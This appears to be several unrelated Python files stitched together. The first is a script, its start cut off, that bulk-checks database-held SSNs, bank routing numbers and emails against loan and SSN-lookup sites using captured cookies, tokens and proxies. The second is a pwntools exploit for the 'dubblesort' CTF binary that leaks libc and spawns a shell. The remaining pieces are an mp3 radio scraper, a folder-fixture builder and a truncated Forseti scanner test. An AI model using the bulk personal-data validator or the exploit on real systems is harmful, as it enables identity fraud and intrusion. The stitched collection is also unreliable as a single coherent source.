    except Exception as e:
        print(str(e))
        return -1
    print(resp.text)
    resp_txt = resp.text
    # Strip the JSONP wrapper.  NOTE(review): .replace(')','') removes
    # EVERY ')' in the body, which would corrupt a payload containing
    # parentheses -- works only because this response never has any.
    resp_text = resp_txt.replace('jQuery2230839557435128814_1582817474953(','').replace(')','')
    data = json.loads(resp_text)
    print(data['Result'])
    # print(str(resp))
    flag = 0
    if data['Result'] == 1:
        # print('routing is valid')
        flag = 1
    elif data['Result'] == 4:
        # print('routing is not valid')
        flag = 0
    else:
        # Unknown Result values fall through with flag == 0.
        print(data)
    return flag
def validate_routing_10104(routing):
    """Probe the gazelleloans.com bank-routing endpoint and print the raw
    response body.

    Returns -1 when the request fails; otherwise returns None (the
    response is only printed, not interpreted).
    """
    # routing = 421051540
    endpoint = 'https://gazelleloans.com/api/bank/?routing=%s'%routing
    try:
        response = requests.get(endpoint)
    except Exception as err:
        print(str(err))
        return -1
    print(response.text)
def validate_routing_123(routing):
    """POST a routing number to 123cashnow.com's validator and record the
    verdict on the owning BasicInfo row.

    Args:
        routing: mapping with 'routing_number' and 'BasicInfo_Id' keys.

    Writes BasicInfo.routing_alive: 1 for 'true', 0 for 'false',
    2 for any other body, -1 when the request failed.
    """
    endpoint = 'https://www.123cashnow.com/longform/validateroutingnumber'
    headers = {
        'accept': 'application/json, text/javascript, */*; q=0.01',
        'accept-encoding': 'gzip, deflate, br',
        'accept-language': 'en-US,en;q=0.9',
        'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'cookie': 'PHPSESSID=ctlfvlc53mems2mrc6qk2h4gl6; ad=10222ce57df8c1ba4acd1e6f6bd182; campaign=; confpage=; site=123cashnow.com; source=1039-3392; affp=WjBt0c; action_tracking_id=1591712215404476000; leadtoro-_zldp=gn2ewDEDzKOiQl99yzfFgWkVed2erD0MyFKvqHENjItkA89K3yF8lS6uFTOdlRJzodoRkLyJC2Y%3D; leadtoro-_zldt=836fe2fc-4f74-499a-a2d0-b69035a3db4a; _ga=GA1.2.828820731.1591712221; _gid=GA1.2.279749699.1591712221; isiframeenabled=true; _lr_uf_-conhio=f359f8ba-087d-4467-ba78-cb826c99b63c; _lr_tabs_-conhio%2F123cashnow={%22sessionID%22:0%2C%22recordingID%22:%224-963859ec-7d0c-4c28-a4b3-8f324fb4ece0%22%2C%22lastActivity%22:%222020-06-09T14:17:58.929Z%22}; 6bdfac53cbfb648b7ebe7a1fe1b93f4d=%7B%22v%22%3A%225.5%22%2C%22a%22%3A2459678624%2C%22b%22%3A%224399b000f71eb53c1b2cb1191970c2ec%22%2C%22c%22%3A1591712281043%2C%22d%22%3A%2290975adc0caa4142da0b98eecda00352%22%2C%22e%22%3A%22%22%7D; _lr_hb_-conhio%2F123cashnow={%22heartbeat%22:%222020-06-09T14:19:58.845Z%22}',
        'origin': 'https://www.123cashnow.com',
        'referer': 'https://www.123cashnow.com/longform',
        'sec-fetch-dest': 'empty',
        'sec-fetch-mode': 'cors',
        'sec-fetch-site': 'same-origin',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'x-requested-with': 'XMLHttpRequest'
    }
    # Numbers sourced from excel come back as floats; drop the '.0'.
    payload = {'routing_number': str(routing['routing_number']).replace('.0','')}
    encoded = parse.urlencode(payload)
    session = requests.session()
    flag = -1
    try:
        resp = session.post(endpoint,data=encoded,headers=headers)
        resp.encoding='UTF-8'
        body = resp.text
        print(body)
        if body == 'false':
            flag = 0
        elif body == 'true':
            flag = 1
        else:
            flag = 2
    except Exception as err:
        print(str(err))
        flag = -1
    sql_content = "UPDATE BasicInfo SET routing_alive = '%d' WHERE Basicinfo_Id = '%s'" % (flag,routing['BasicInfo_Id'])
    db.Execute_sql([sql_content])
    return
def get_emails(file=r'..\res\email.txt'):
    """Read one email address (or other token) per line from *file*.

    Args:
        file: path to a newline-delimited list.  Defaults to the project's
            standard email fixture (previously a commented-out hint inside
            the function), so existing zero-argument call sites work.

    Returns:
        list of lines with the trailing newline removed.
    """
    with open(file,'r') as f:
        emails = f.readlines()
    # readlines() keeps the '\n' terminator; strip it from every entry.
    return [email.replace('\n','') for email in emails]
def validate_email(email):
    """Ask the consumerconnecting.com validator whether *email* exists.

    Returns 1 when the service reports Result == 1 (address alive),
    0 for any other Result, and -1 when the response body is not JSON.
    """
    # print('email:',email)
    endpoint = 'https://www.consumerconnecting.com/misc/?responsetype=json&action=validateemail&email=%s'%email
    resp = requests.get(endpoint)
    try:
        res = json.loads(resp.text)
    except:
        return -1
    # print("res['Result']",res['Result'])
    return 1 if res['Result'] == 1 else 0
def validate_10088_email(email):
    """Drive the cashrequestonline.com signup form in a real browser to see
    whether *email* is already on file.

    Types the address, clicks submit, then polls the page up to 5 times for
    either the 'already on file' banner (flag 0) or the next-step prompt
    (flag 1).  NOTE(review): the computed flag is never returned -- the
    function ends in a ~50-minute sleep, so it only reports via printed
    messages; this looks like leftover debugging code.
    """
    submit = {}
    # port = '29050'
    # submit['port_lpm'] = int(port)
    # ip = '192.168.89.130'
    # submit['ip_lpm'] = ip
    submit['Mission_Id'] = 10000
    # submit['ua'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
    url = 'https://cashrequestonline.com/Home/GetStarted'
    chrome_driver = Chrome_driver.get_chrome(None,headless=0)
    # print('+++++++++++++========')
    chrome_driver.get(url)
    print('Loading finished')
    # XPaths captured from the live page; brittle against redesigns.
    xpath_email = '//*[@id="Email"]'
    xpath_button = '/html/body/div[1]/div/section/div/div/div/form/div/div[2]/div[2]/div/div/a'
    xpath_badinfo = '/html/body/div[1]/div/section/div/div/div/form/div/div[3]/div[1]/div/div[1]/p'
    xpath_goodinfo = '/html/body/div[1]/div/section/div/div/div/form/div/div[3]/p'
    good_info = 'How Much Do You Need?'
    bad_info = 'Looks like we have your email on file.'
    if 'This site can’t be reached' in chrome_driver.page_source:
        print('net wrong')
        chrome_driver.close()
        chrome_driver.quit()
        return
    else:
        print('net right')
    WebDriverWait(chrome_driver,50).until(EC.visibility_of_element_located((By.XPATH,xpath_email)))
    print('email ready')
    chrome_driver.find_element_by_xpath(xpath_email).send_keys(email)
    WebDriverWait(chrome_driver,50).until(EC.visibility_of_element_located((By.XPATH,xpath_button)))
    print('button ready')
    time.sleep(3)
    chrome_driver.find_element_by_xpath(xpath_button).click()
    flag = -1
    for i in range(5):
        if bad_info in chrome_driver.page_source:
            if EC.visibility_of_element_located((By.XPATH,xpath_badinfo)):
                flag = 0
                print('bad info found...')
                break
        try:
            chrome_driver.find_element_by_xpath(xpath_goodinfo).click()
            print('find good info')
            flag = 1
            break
        except:
            pass
        else:
            # NOTE(review): bare sleep() -- presumably 'from time import
            # sleep' at module top; verify (time.sleep is used elsewhere).
            sleep(1)
    time.sleep(3000)
def validate_10088_email3(email):
    """Query the consumerconnecting validateemail endpoint directly and
    dump the full HTTP exchange for debugging.

    Fix: the query string previously read 'email=email=%s', which sent the
    literal prefix 'email=' as part of the address being validated; it now
    sends a single 'email=%s' parameter (matching validate_email()).
    """
    url = 'http://www.consumerconnecting.com/misc/?responsetype=json&action=validateemail&email=%s'%email
    headers = {
        'Host': 'www.consumerconnecting.com',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Origin': 'https://cashrequestonline.com',
        'Connection': 'keep-alive',
        'Referer': 'https://cashrequestonline.com/GetStarted?PhoneHome=407-536-669&SSN=1172&PhoneHome=407-536-669&SSN=1172',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
    response = requests.get(url=url,headers=headers)
    print(response.status_code)  # HTTP status code
    print(response.url)          # final request URL
    print(response.headers)      # response headers
    print(response.cookies)      # cookie jar
    print(response.text)         # body decoded as text
    print(response.content)      # body as raw bytes
def validate_10088_email2(email):
    """Check whether *email* is already known to the 10088 campaign
    database via the consumerconnecting campaignstatus JSONP endpoint.

    Returns 1 when the service reports Result == 1 (not in the database),
    0 for any other Result, and -1 when the request or JSON decode fails.
    Uses a fixed uid value previously captured from the site's cookies.
    """
    submit = {}
    submit['Mission_Id'] = 10000
    submit['ua'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
    url = 'https://cashrequestonline.com/Home/GetStarted'
    # uid harvested from the site's 'hit' cookie on a previous run.
    uid = 'cdfb01b6-a06d-4a08-891b-bf2f9a11ce6d'
    print(uid)
    if uid == '':
        return
    # Millisecond timestamp, as the site's own JavaScript sends it.
    stick = int(round(time.time() * 1000))
    url2 = 'https://www.consumerconnecting.com/misc/?responsetype=json&action=campaignstatus&c=235100&email=%s&leadtypeid=9&mailsrc=field&callback=posting.isReturning&uts=%d&uid=%s'%(email,stick,uid)
    session = requests.session()
    session.headers.clear()
    try:
        resp = session.get(url2)
        print(resp.text)
        # Unwrap the JSONP callback to reach the JSON payload.
        body = resp.text.replace('posting.isReturning(','').replace(')','')
        res = json.loads(body)
    except Exception as err:
        print(err)
        return -1
    print("res['Result']",res['Result'])
    if res['Result'] == 1:
        print('email not in 10088 db')
        return 1
    print('email in 10088 db')
    return 0
def validate_ssn(ssn):
    """Look up *ssn* on ssnregistry.org and persist the verdict.

    Scrapes the result page for the SSN: 'invalid' marks the number bad,
    'for XX' yields a two-letter issuing state for a valid number.
    Writes ssn_status ('empty'/'invalid'/'valid') and ssn_state back to
    the BasicInfo table, matching rows whose ssn column carries a
    trailing '.0' suffix.
    """
    form = {}
    form['ssn'] = str(ssn)
    # CSRF token captured from a previous session of the site.
    form['_token'] = 'IQCWfm8ze7Ktfn2GhkwoPcA9KRWTFtEuvH8ZmeE7'
    encoded = parse.urlencode(form)
    headers,cookies = get_headers()
    first_headers = get_first_headers()
    url_ = 'https://www.ssnregistry.org/validate/'
    for _ in range(1):
        session = requests.session()
        resp = session.post(url_,data=encoded,headers=headers,cookies = cookies)
        resp.encoding='UTF-8'
        page = resp.text
        start = page.find(str(ssn))
        ssn_status = 'empty'
        ssn_state = ''
        if start != -1:
            stop = page.find('.</p>',start)
            content = 'Social Security number '+page[start:stop]
            print('Content is :',content)
            if 'invalid' in content:
                ssn_status = 'invalid'
            if 'for ' in content:
                # The verdict sentence ends with the two-letter state code.
                state = content[-2:]
                print('State is:',state)
                ssn_status = 'valid'
                ssn_state = state
        print(ssn_status,ssn_state,ssn)
        ssn = str(ssn)+'.0'
        sql_content = "UPDATE BasicInfo SET ssn_status = '%s' , ssn_state = '%s' WHERE ssn = '%s'" % (ssn_status,ssn_state,ssn)
        db.Execute_sql([sql_content])
def validate_ssn2(ssn):
    """Check *ssn* against the socialsecurityofficenear.me validator form.

    Fix: the previous version ignored its argument and always posted a
    hard-coded area/group/series.  The SSN is now normalised to nine
    digits and split into its three components (AAA-GG-SSSS).
    """
    headers = get_headers2()
    url = 'https://socialsecurityofficenear.me/social-security-numbers/validator/'
    # Accept ints or dashed strings; left-pad so leading zeros survive.
    digits = str(ssn).replace('-','').zfill(9)
    data = {
        'area': digits[0:3],
        'group': digits[3:5],
        'series': digits[5:9]
    }
    data_ = parse.urlencode(data)
    s = requests.session()
    # Prime the session (cookies) before posting the form.
    s.get(url)
    resp = s.post(url,headers=headers,data=data_)
    resp_text = resp.text
    print(resp_text)
    print(resp.headers)
    if 'No match found' in resp_text:
        print('No match found')
    else:
        pass
def main():
    """Traffic driver: repeatedly fetch an account, read its traffic
    plans, configure one proxy port per plan, then dispatch traffic_test
    jobs on the shared thread pool.

    Fixes: read_plans() was called with the undefined name ``i``
    (NameError at runtime); it now receives the account's plan id.  The
    local that shadowed the ``requests`` module has been renamed.
    """
    for j in range(111):
        account = get_account()
        plan_id = account['plan_id']
        traffics = read_plans(plan_id)  # was read_plans(i): i undefined
        print(traffics)
        # print(len(traffics))
        ip_lpm = account['IP']
        for traffic in traffics:
            # traffic['key'] = 'getaround'
            traffic['port_lpm'] = get_port_random()
            # traffic['Record'] = 3
            add_proxy(traffic['port_lpm'],country=traffic['Country'],proxy_config_name='zone2',ip_lpm=ip_lpm)
        # 'work_items' was previously named 'requests', shadowing the module.
        work_items = threadpool.makeRequests(traffic_test, traffics)
        [pool.putRequest(req) for req in work_items]
        pool.wait()
        print('finish sending traffic,sleep for 30')
def test():
    """Smoke-test validate_10088_email() against the first 30 addresses of
    the standard email fixture and tally the returned flags.

    Fix: get_emails() requires a file path; it is now given the fixture
    path documented inside get_emails() (the old zero-argument call raised
    TypeError).
    """
    emails = get_emails(r'..\res\email.txt')
    length = len(emails)
    length = 30  # only probe the first 30 addresses
    flags = {}
    flags['bad'] = 0  # counts addresses whose validation raised
    for i in range(length):
        print('Email number:',i)
        try:
            flag = validate_10088_email(emails[i])
        except:
            flags['bad'] += 1
            continue
        if str(flag) not in flags:
            flags[str(flag)] = 1
        else:
            flags[str(flag)] += 1
    print(flags)
def test_ssn():
    """Validate every SSN listed in the fixture file on the shared
    thread pool."""
    ssn_file = r'..\res\ssn.txt'
    ssns = get_emails(ssn_file)
    length = len(ssns)
    print('total %d ssns to test'%length)
    work_items = threadpool.makeRequests(validate_ssn, ssns)
    for req in work_items:
        pool.putRequest(req)
    pool.wait()
# Shared worker pool used by the test_* drivers in this module.
pool = threadpool.ThreadPool(100)
def test_routing_123():
    """Run validate_routing_123 over every routing row of one excel-named
    table, fanned out on the shared thread pool."""
    excel = 'Us_pd_native3'
    routing_rows = db.get_routing(excel)
    for req in threadpool.makeRequests(validate_routing_123, routing_rows):
        pool.putRequest(req)
    pool.wait()
def get_ssn():
    """Dump SSNs whose status is empty or NULL in the database to the
    ssn.txt fixture, one integer per line."""
    out_file = r'..\res\ssn.txt'
    ssn_empty,ssn_isnull = db.get_ssn()
    # DB stores the SSN as a float-like string; normalise to a plain int.
    values = [int(float(row['ssn'])) for row in ssn_empty]
    values += [int(float(row['ssn'])) for row in ssn_isnull]
    content = ''.join(str(value)+'\n' for value in values)
    with open(out_file,'w') as f:
        f.write(content)
def test_email():
    """Build, print and return the UPDATE statement that clears an SSN's
    status fields.

    Fix: the SET clause joined its two assignments with ``and``, which SQL
    parses as a boolean expression assigned to ssn_status alone; the
    assignments are now comma-separated, matching validate_ssn().  The
    statement is also returned so it can be asserted on.
    """
    ssn_status,ssn_state = '',''
    ssn = 275238997
    # '%.1f' reproduces the '.0'-suffixed form stored in the ssn column.
    sql_content = "UPDATE BasicInfo SET ssn_status = '%s' , ssn_state = '%s' WHERE ssn = '%.1f'" % (ssn_status,ssn_state,float(ssn))
    print(sql_content)
    return sql_content
def test_email_10088():
    """Spot-check validate_email() with a single known address."""
    sample = 'jerry.griffin@cableone.net'
    validate_email(sample)
if __name__ == '__main__':
test_routing_123() |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
# Verbose pwntools output while developing the exploit.
context.log_level = 'debug'
elf = ELF('./dubblesort')
libc = ELF('/usr/lib32/libc-2.32.so')
# Memory locations
# NOTE(review): bin_sh is computed but not referenced in main() below
# (the '/bin/sh' string found inside libc is used instead) -- confirm
# before removing.
bin_sh = elf.bss() + 0x100
# Byte sequence alias
A4 = 4 * b'A'
def main():
    """Exploit driver for the 'dubblesort' pwnable.

    Leaks a libc pointer through the name echo, computes the libc base,
    then sends 35 numbers whose sorted order is preserved and whose tail
    lands system('/bin/sh') on the saved return address.

    Fixes: raw_input() does not exist under the file's python3 shebang
    (NameError) -- replaced with input(); typo in the gdb log message.
    """
    proc = elf.process()
    log.debug('You may attach this process to gdb now.')
    # Pause so a debugger can be attached before any interaction.
    input()  # was raw_input(), a NameError on Python 3
    # Develop your exploit here
    proc.recvuntil('What your name :')
    # Send 16 'A's; the 4 bytes echoed right after them are read back
    # below and treated as a pointer into libc (__exit_funcs_lock).
    proc.send(A4 * 4)
    proc.recvuntil('Hello ' + 'AAAA' * 4)
    libc__exit_funcs_lock = u32(proc.recv(4))
    libc_base = libc__exit_funcs_lock - libc.sym['__exit_funcs_lock']
    libc_system = libc_base + libc.sym['system']
    libc_bin_sh = libc_base + list(libc.search(b'/bin/sh'))[0]
    log.info('__exit_funcs_lock@libc: {}'.format(hex(libc__exit_funcs_lock)))
    log.info('libc base: {}'.format(hex(libc_base)))
    log.info('system@libc: {}'.format(hex(libc_system)))
    log.info('bin_sh@libc: {}'.format(hex(libc_bin_sh)))
    proc.recvuntil('sort :')
    proc.sendline(str(35).encode())
    # We must make sure our payload will remain
    # in the correct order after being sorted.
    payload = [0x30678 if i < 24 else 0xf0000000 for i in range(32)]
    payload.append(libc_system)  # ret
    payload.append(libc_bin_sh)  # system()'s ret addr
    payload.append(libc_bin_sh)  # system()'s 1st arg
    for i in range(35):
        proc.recvuntil('number : ')
        # b'+' will be ignored by scanf("%u")
        proc.sendline(b'+' if i == 24 else str(payload[i]).encode())
    proc.interactive()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
__author__ = 'Rodrigo Gomes'
#requires https://github.com/Dirble/streamscrobbler-python
#special thanks to Håkan Nylén for making the streamscrobbler-python
#metadata-extraction algorithm available
import urllib, time, os, urlparse,sys
from bs4 import BeautifulSoup
from streamscrobbler import streamscrobbler
streamscrobbler = streamscrobbler()
class Fareja():
    """Watches a web-radio stream and tries to download each song it hears.

    Flow: poll the stream metadata for the current song title, search
    emp3world.com for a direct .mp3 link, download the first hit into the
    'Rock' directory, then recurse (via the module-level ``fareja``
    instance) to wait for the next track.

    NOTE(review): radio() and procura() recurse into each other through
    the global ``fareja`` object with no depth limit; a long session will
    eventually exhaust the recursion stack.  Python 2 code.
    """
    def __init__(self):
        # Last song seen; used to detect track changes in radio().
        self.aux = []
        self.musica = list()
        # Search URL template; %(query)s is filled with the song title.
        self.query_url = 'http://emp3world.com/search/%(query)s_mp3_download.html'
        self.links = list()
        self.status = []
        # Work inside a 'Rock' subdirectory, creating it on first run.
        if os.path.exists("Rock"):
            os.chdir("Rock")
        else:
            os.mkdir("Rock")
            os.chdir("Rock")
    def radio(self, stream):
        # Poll *stream* until a real song title is playing, then search it.
        self.stream = stream
        stationinfo = streamscrobbler.getServerInfo(self.stream)
        try:
            self.musica = str(dict(stationinfo.get("metadata"))['song'])
            if self.musica != '89 Radio Rock - We rock Sampa since 1985!':
                self.status = "Tocando: %s" % self.musica
            else:
                # Station slogan means no song playing: wait and re-poll.
                self.status = "Sem Musica -- Os Radialistas estão conversando Aguarde..."
                time.sleep(10)
                fareja.radio(self.stream)
        except:
            # Metadata fetch/parse failed; retry immediately.
            fareja.radio(self.stream)
        if self.musica != self.aux and self.musica != '89 Radio Rock - We rock Sampa since 1985!' and self.musica is not None:
            self.aux = self.musica
            print self.status
            self.procura(self.musica)
        else:
            fareja.radio(self.stream)
    def procura(self, query):
        # Search emp3world for *query*; download the first direct .mp3 hit.
        self.links = []
        print "Procurando Links Diretos de %s na Web" % query
        query = (query.strip().lower())
        request = urllib.urlopen(self.query_url % { 'query': query })
        data = request.read()
        text = data.decode('utf8', errors='ignore')
        soup = BeautifulSoup(text)
        # Collect every absolute href that points straight at an .mp3.
        for tag in soup.findAll('a', href=True):
            tag['href'] = urlparse.urljoin(self.query_url, tag['href'])
            if tag['href'].endswith(".mp3"):
                self.links.append(tag['href'])
        print "%i links para download" % len(self.links)
        if len(self.links)==0:
            print 'ERRO Sem Links diretos para download! Aguardando Próxima Música.\n\n'
            fareja.radio(self.stream)
        elif os.path.exists("Rock/"+query+".mp3"):
            # Already downloaded; go back to listening.
            time.sleep(10)
            fareja.radio(self.stream)
        else:
            try:
                print "baixando: %s Aguarde." % query
                urllib.urlretrieve(self.links[0],query+".mp3")
                print "download de %s concluido" % self.links[0]
                print "Aguardando a Próxima Música\n\n"
                fareja.radio(self.stream)
            except IOError:
                # First link failed; fall back to the second one.
                urllib.urlretrieve(self.links[1],query+".mp3")
                print "download de %s concluido" % self.links[1]
                print "Aguardando a Próxima Música\n\n"
                fareja.radio(self.stream)
            finally:
                # NOTE(review): 'finally' runs on success as well, so this
                # failure message is printed after every download.
                print "Não foi Possível Baixar!\nAguardando Próxima Música"
                print "Farejando a Rádio Aguarde..\n\n"
# Stream playlists: index 0 = Radio Rock, index 1 = Kiss FM.
radios = ['http://www.webnow.com.br/streaming/autoplaylist/v1/radiorock.aac.pls','http://playerservices.streamtheworld.com/pls/SAOPAULO1021AAC.pls']
fareja = Fareja()
# Ask which station to sniff; radio() itself never returns normally.
while True:
    opc = int(input("0 - Farejar Radio Rock.\n1 - Farejar KissFM.\n"))
    fareja.radio(radios[opc])
|
import os
def make_folders(base_dir='C:/Users/Intern/PycharmProjects/project1/folders'):
    """Create a small fixture tree of nested folders and marker files.

    Args:
        base_dir: directory to build the tree in; defaults to the original
            hard-coded development path so existing zero-argument callers
            behave exactly as before.  The directory must already exist.

    Side effects:
        Changes the process working directory to *base_dir*; raises
        FileExistsError (OSError) if any folder already exists.
    """
    os.chdir(base_dir)
    # Parents are listed before children, so plain mkdir suffices.
    for folder in ('folder1',
                   'folder1/folder11',
                   'folder1/folder11/folder111',
                   'folder1/folder12',
                   'folder2',
                   'folder2/folder21'):
        os.mkdir(folder)
    # Empty marker files ('a' mode: create if absent, never truncate).
    for name in ('a_file1.txt',
                 'folder1/a_file2.txt',
                 'folder1/a_file3.txt',
                 'folder1/folder11/a_file4.txt',
                 'folder2/a_file5.txt',
                 'folder2/folder21/a_file6.txt',
                 'folder1/folder12/b_file1.txt',
                 'folder2/b_file2.txt',
                 'folder2/folder21/b_file3.txt',
                 'folder1/c_file2.txt',
                 'folder1/folder11/c_file3.txt',
                 'folder1/folder11/folder111/c_file4.txt',
                 'folder2/folder21/c_file5.txt'):
        open(name, 'a').close()
    # The only file with content.
    with open('c_file1.txt', 'a') as f:
        f.write("texttexttext")
# Build the fixture tree when run as a script.
if __name__ == "__main__":
    make_folders()
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""IAP scanner test"""
from datetime import datetime
import json
import mock
import unittest
import yaml
from google.cloud.security.common.gcp_type import backend_service as backend_service_type
from google.cloud.security.common.gcp_type import firewall_rule as firewall_rule_type
from google.cloud.security.common.gcp_type import instance_group as instance_group_type
from google.cloud.security.common.gcp_type import instance_group_manager as instance_group_manager_type
from google.cloud.security.common.gcp_type import instance as instance_type
from google.cloud.security.common.gcp_type import instance_template as instance_template_type
from google.cloud.security.common.gcp_type import project as project_type
from google.cloud.security.common.gcp_type import network as network_type
from google.cloud.security.scanner.scanners import iap_scanner
from tests.unittest_utils import ForsetiTestCase
from tests.unittest_utils import get_datafile_path
class FakeProjectDao(object):
    """Stub project DAO that fabricates a Project for any requested id."""

    def get_project(self, project_id, snapshot_timestamp=0):
        """Return a bare Project carrying *project_id*; timestamp ignored."""
        fake_project = project_type.Project(project_id=project_id)
        return fake_project
class FakeOrgDao(object):
    """Stub org-relationship DAO: every resource has no ancestors."""

    def find_ancestors(self, resource_id, snapshot_timestamp=0):
        """Always report an empty ancestry chain."""
        ancestors = []
        return ancestors
class IapScannerTest(ForsetiTestCase):
    def network_port(self, port_number, project='foo', network='default'):
        """Build an iap_scanner.NetworkPort for *port_number*; the project
        and network defaults match the fixtures created in setUp."""
        return iap_scanner.NetworkPort(
            network=network_type.Key.from_args(project_id=project,
                                               name=network),
            port=port_number)
    def tearDown(self):
        """Stop the DAO patches started in setUp."""
        self.org_patcher.stop()
        self.project_patcher.stop()
    def setUp(self):
        """Build the scanner under test plus in-memory GCP fixtures.

        Patches the org/project DAOs with fakes, constructs an IapScanner
        whose data-access hooks are lambdas over the fixture dicts defined
        below (the lambdas are evaluated lazily, so defining the dicts
        after assigning the hooks is safe), and snapshots everything into
        an iap_scanner._RunData for direct assertions.
        """
        self.fake_utcnow = datetime(
            year=1900, month=1, day=1, hour=0, minute=0, second=0,
            microsecond=0)
        # patch the daos
        self.org_patcher = mock.patch(
            'google.cloud.security.common.data_access.'
            'org_resource_rel_dao.OrgResourceRelDao')
        self.mock_org_rel_dao = self.org_patcher.start()
        self.mock_org_rel_dao.return_value = FakeOrgDao()
        self.project_patcher = mock.patch(
            'google.cloud.security.common.data_access.'
            'project_dao.ProjectDao')
        self.mock_project_dao = self.project_patcher.start()
        self.mock_project_dao.return_value = FakeProjectDao()
        self.fake_scanner_configs = {'output_path': 'gs://fake/output/path'}
        self.scanner = iap_scanner.IapScanner(
            {}, {}, '',
            get_datafile_path(__file__, 'iap_scanner_test_data.yaml'))
        self.scanner.scanner_configs = self.fake_scanner_configs
        # Replace the scanner's data-access hooks with fixture lookups.
        self.scanner._get_backend_services = lambda: self.backend_services.values()
        self.scanner._get_firewall_rules = lambda: self.firewall_rules.values()
        self.scanner._get_instances = lambda: self.instances.values()
        self.scanner._get_instance_groups = lambda: self.instance_groups.values()
        self.scanner._get_instance_group_managers = lambda: self.instance_group_managers.values()
        self.scanner._get_instance_templates = lambda: self.instance_templates.values()
        self.backend_services = {
            # The main backend service.
            'bs1': backend_service_type.BackendService(
                project_id='foo',
                name='bs1',
                backends=json.dumps(
                    [{'group': ('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/'
                                'instanceGroups/ig_managed')},
                     {'group': ('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/'
                                'instanceGroups/ig_unmanaged')},
                    ]),
                iap=json.dumps({'enabled': True}),
                port=80,
                port_name='http',
            ),
            # Another backend service that connects to the same backend.
            'bs1_same_backend': backend_service_type.BackendService(
                project_id='foo',
                name='bs1_same_backend',
                backends=json.dumps(
                    [{'group': ('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/'
                                'instanceGroups/ig_managed')},
                    ]),
                port=80,
            ),
            # A backend service with a different port (so, not an alternate).
            'bs1_different_port': backend_service_type.BackendService(
                project_id='foo',
                name='bs1_different_port',
                backends=json.dumps(
                    [{'group': ('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/'
                                'instanceGroups/ig_managed')},
                    ]),
                port=81,
            ),
            # Various backend services that should or shouldn't be alts.
            'bs1_same_instance': backend_service_type.BackendService(
                project_id='foo',
                name='bs1_same_instance',
                backends=json.dumps(
                    [{'group': ('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/'
                                'instanceGroups/ig_same_instance')},
                    ]),
                port=80,
            ),
            'bs1_different_network': backend_service_type.BackendService(
                project_id='foo',
                name='bs1_different_network',
                backends=json.dumps(
                    [{'group': ('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/'
                                'instanceGroups/ig_different_network')},
                    ]),
                port=80,
            ),
            'bs1_different_instance': backend_service_type.BackendService(
                project_id='foo',
                name='bs1_different_instance',
                backends=json.dumps(
                    [{'group': ('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/'
                                'instanceGroups/ig_different_instance')},
                    ]),
                port=80,
            ),
        }
        self.firewall_rules = {
            # Doesn't apply because of IPProtocol mismatch.
            'proto_mismatch': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='proto_mismatch',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_tags=json.dumps(['proto_mismatch']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'udp',
                }]),
            ),
            # Preempted by allow.
            'deny_applies_all_preempted': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='deny_applies_all_preempted',
                firewall_rule_priority=60000,
                firewall_rule_network='global/networks/default',
                firewall_rule_source_ranges=json.dumps(['applies_all']),
                firewall_rule_denied=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
            # Applies to all ports, tags.
            'applies_all': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='applies_all',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_ranges=json.dumps(['10.0.2.0/24']),
                firewall_rule_source_tags=json.dumps(['applies_all']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
            # Applies to only port 8080.
            'applies_8080': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='applies_8080',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_tags=json.dumps(['applies_8080']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                    'ports': [8080],
                }]),
            ),
            # Applies to a multi-port range.
            'applies_8081_8083': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='applies_8081_8083',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_tags=json.dumps(['applies_8081_8083']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                    'ports': ['8081-8083'],
                }]),
            ),
            # Doesn't apply because of direction mismatch.
            'direction': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='direction',
                firewall_rule_direction='EGRESS',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_tags=json.dumps(['direction']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
            # Doesn't apply because of network mismatch.
